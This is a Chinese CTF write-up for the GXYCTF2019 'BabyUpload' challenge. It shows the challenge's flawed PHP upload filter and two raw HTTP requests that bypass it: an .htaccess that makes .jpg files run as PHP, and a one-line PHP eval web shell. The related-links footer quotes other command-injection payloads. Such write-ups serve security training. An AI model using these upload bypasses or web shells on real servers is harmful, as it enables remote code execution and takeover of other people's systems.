首页 > 其他分享 >[GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload

时间:2023-11-02 21:45:12浏览次数:31  
标签:uploaded FILES name image BabyUpload Content GXYCTF2019 WebKitFormBoundaryT7cVgg

题目附件如下。

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> 
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    $target_path  = getcwd() . "/upload/" . md5($_SESSION['user']);
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp  = $_FILES['uploaded']['tmp_name'];
 
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
        die("后缀名不能有ph!");
    }
    else{
        if ((($_FILES["uploaded"]["type"] == "
            ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
            $content = file_get_contents($uploaded_tmp);
            if(preg_match("/\<\?/i", $content)){
                die("诶,别蒙我啊,这标志明显还是php啊");
            }
            else{
                mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
                move_uploaded_file($uploaded_tmp, $t_path);
                echo "{$t_path} succesfully uploaded!";
            }
        }
        else{
            die("上传类型也太露骨了吧!");
        }
    }
}
?>

这里可以看到,用户上传的文件后缀名不能存在 ph,并且要求 Content-Type 仅为 image/jpegimage/pjpeg,并且要求上传内容的大小小于 2048。其次之外,还匹配了 <? 符号。
因此,直接先上传 Apache 的配置文件 .htaccess,设置 .jpg 结尾的文件当作 PHP 文件进行解析,随后上传一个 .jpg 图片马,即可 Getshell

POST / HTTP/1.1
Host: 4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81
Content-Length: 359
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT7cVggBJBWlA2EjZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=09c3fcdd0d40284b5528d0dafe4a0bb2
Connection: close

------WebKitFormBoundaryT7cVggBJBWlA2EjZ
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

<IfModule mime_module>
AddType application/x-httpd-php .jpg
</IfModule>
------WebKitFormBoundaryT7cVggBJBWlA2EjZ
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryT7cVggBJBWlA2EjZ--

POST / HTTP/1.1
Host: 4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81
Content-Length: 332
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT7cVggBJBWlA2EjZ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://4adbbf22-c2dd-47a2-b710-16fbd031fe26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=09c3fcdd0d40284b5528d0dafe4a0bb2
Connection: close

------WebKitFormBoundaryT7cVggBJBWlA2EjZ
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<script language="php">@eval($_POST[cmd])</script>
------WebKitFormBoundaryT7cVggBJBWlA2EjZ
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryT7cVggBJBWlA2EjZ--

image.png

标签:uploaded,FILES,name,image,BabyUpload,Content,GXYCTF2019,WebKitFormBoundaryT7cVgg
From: https://www.cnblogs.com/imtaieee/p/17806398.html

相关文章

  • [GXYCTF2019]禁止套娃
    原理.git泄露,githack获取源码无参RCE执行解题过程进入靶场,每看到有用的信息,那就只能目录扫描了,扫到了.git目录,就用githack获取源码<?phpinclude"flag.php";echo"flag在哪里呢?<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|filter:\/\/|php:\/......
  • [GXYCTF2019]Ping Ping Ping 1
    原理RCE命令执行的多种绕过姿势解题过程进入靶场提示要传递参数ip那就传递一下127.0.0.1,结果正常试试进行拼接,试了127.0.0.1&&ls或者127.0.0.1&ls都不行,,,直到用;做连接符才可以payload:127.0.0.1;ls发现有index.php和flag.php文件,猜测flag应该在flag.php内接着尝试读取......
  • Buuctf——[GXYCTF2019]BabySQli
    本题目是一道联合注入进入页面后发现只有一个登录框。知识点unionselect联合查询union拼接的两个查询语句查询字段数必须一样多当其中一个查询结果为空时,不影响另外一个语句的查询结果联合注入核心是使用拼接的select语句同时使原查询语句结果为空来覆盖原查询结果,从而实......
  • [GXYCTF 2019]BabyUpload
    [GXYCTF2019]BabyUpload题目来源:nssctf题目类型:web涉及考点:文件上传1.题目要求直接传马,先试试`muma.php`不行,再试试muma.jpg:提示说明一句话木马内不能有php标志(即<?),我们看看响应标头,使用的是php5.6.23因此可以构造<scriptlanguage='php'>eval($_POST['r00ts']);<......
  • [NISACTF 2022]babyupload
    [NISACTF2022]babyupload题目来源:nssctf题目类型:web涉及考点:文件上传1.题目说传一个图片文件,那我们传个muma.jpg看看但是上传失败:回去检查一下源代码,发现有/source直接访问下载了一个压缩文件,解压之后是一个py文件,随后进行代码审计2.代码审计fromflaskimportFl......
  • [GXYCTF2019]Ping Ping Ping
    [GXYCTF2019]PingPingPing题目来源:buuctf题目类型:web涉及考点:命令执行1.题目页面如下:我们将其作为参数传入,/?ip=127.0.0.1,回显如下:接下来通过命令行查看目录:/?ip=127.0.0.1;ls2.发现了flag.php,直接查看/?ip=127.0.0.1;catflag.php发现空格被过滤了,我们采取以下......
  • BUUCTF:[GXYCTF2019]禁止套娃
    https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83.git泄露,使用GitHackindex.php<?phpinclude"flag.php";echo"flag在哪里呢?<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|fil......
  • [GXYCTF2019]Ping Ping Ping 1
    先尝试输入ip=127.0.0.1发现啥也没有再次在后面输入ls查看文件发现有两个文件Cat一下发现有空格过滤进行空格绕过$(IFS)(?ip=127.0.0.1;cat$IFS$1flag.php)发现符合也进行了过滤尝试进行拼接flag?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php发现flag......
  • BUUCTF-[GXYCTF2019]禁止套娃​​
    [GXYCTF2019]禁止套娃.git源码泄露、工具GitHack无参数RCEphp函数的利用题目中什么信息都没有这是一道.git源码泄露的题目,使用工具GitHack下载源码pythonGitHack.pyhttp://fa565425-847d-4196-ba33-85056f1d7ce1.node4.buuoj.cn:81/.git查看到index.php的源码,关键代码如下......
  • Reverse|[GXYCTF2019]luck_guy
    ida64打开文件,搜索字符串进入pleaseinputaluckynumber伪代码输入数字进入patch_me(v4);,输入数字为偶数进入get_flag()函数unsigned__int64get_flag(){unsignedintv0;//eaxcharv1;//alsignedinti;//[rsp+4h][rbp-3Ch]signedintj;//[rsp......